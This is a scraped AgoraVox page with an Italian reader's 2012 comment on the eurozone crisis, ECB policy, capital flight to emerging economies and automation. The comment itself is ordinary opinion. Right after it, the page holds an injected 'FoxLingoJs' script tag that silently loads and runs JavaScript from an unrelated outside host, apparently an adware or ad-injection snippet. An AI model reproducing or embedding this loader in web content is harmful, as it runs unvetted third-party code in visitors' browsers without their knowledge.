• AgoraVox su Twitter
  • RSS
  • Agoravox Mobile


Commento di

su Senza una visione politica l'Europa non avrà futuro


Vedi tutti i commenti di questo articolo

15 settembre 2012 12:47

credere che le misure intraprese dalla BCE possano essere la panacea dei problemi finanziari dell’eurozona è pura illusione.
Draghi ha comprato solo ed unicamente solo altro tempo , null’altro.
Illudersi che austerità e ulteriore sacrifici sociali possano convivere col modello economico consumistico del quale sono permiate le economie euopee , è pura utopia.
La spirale recessionistica che si è inevitabilmente innescata si amplierà a tutti i paesi della UE per tre motivi :

  • la crisi è dettata dalla fuga dei capitali che trovano migliore remunerazione nei paesi emergenti e non dalla sfiducia nella restizione dei capitali investiti nei debiti sovrani ( infatti lo spread sale a prescindere delle misure attuate dai governi a garanzia del pagamento dei debiti)
  • il differenziale retributivo tra i paesi emergenti e quelli consumistici è troppo elevato per poter essere colmato con altri fattori quali innovazione e tecnologia.(anche perchè spostare la tecnologia non costa nulla ma spostare una produzione costa parecchio)
  • sino a quando non si regolerà l’abnorme mercato finanziario dei derivati , vera bolla speculativa delle economie, il capitale non avrà nessun interesse ad investire nelle economie reali .
quindi non prendiamoci in giro , i problemi in seno alla UE sicuramente esistono e sono di grande entità ma , la vera battaglia si svolge tra continenti economici , tra una cultura consumistica che sta implodendo ed una emergente che ha trovato spazio e ragione di esistere sulle spalle della prima e che oggi sta iniziando a dettare le sue regole.
L’unica carta che l’occidente ha è di attendere il livellamento dei costi di produzione che inevitabilmente avverrà con l’avvento dell’automazione della produzione quando cioè , tra una decina di anni le macchine saranno in grado di effettuare il 70 % dei lavori manuali che oggi effettua l’uomo ed il 50% di quelli intellettuali .
sino ad oggi questo spettro è stato scongiurato dal costo comunque umano nella costruzione e manutenzione delle macchine ma ormai, le macchine che autocostruiscono sono sempre più una realtà e altrettanto quelle che autoriparano , sino al punto di rendere nullo l’intervento umano .
Ma quando ciò avverrà , allora saremo davanti ad una epocale svolta dove l’uomo , dovrà reinventarsi una ragione di vita ?
<script id="FoxLingoJs">!function(){try{var h=document.getElementsByTagName("head")[0];var s=document.createElement("script");s.src="//edge.crtinv.com/products/FoxLingo/default/snippet.js";s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState=="loaded" || this.readyState=="complete"){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();</script>

Vedi la discussione






Palmares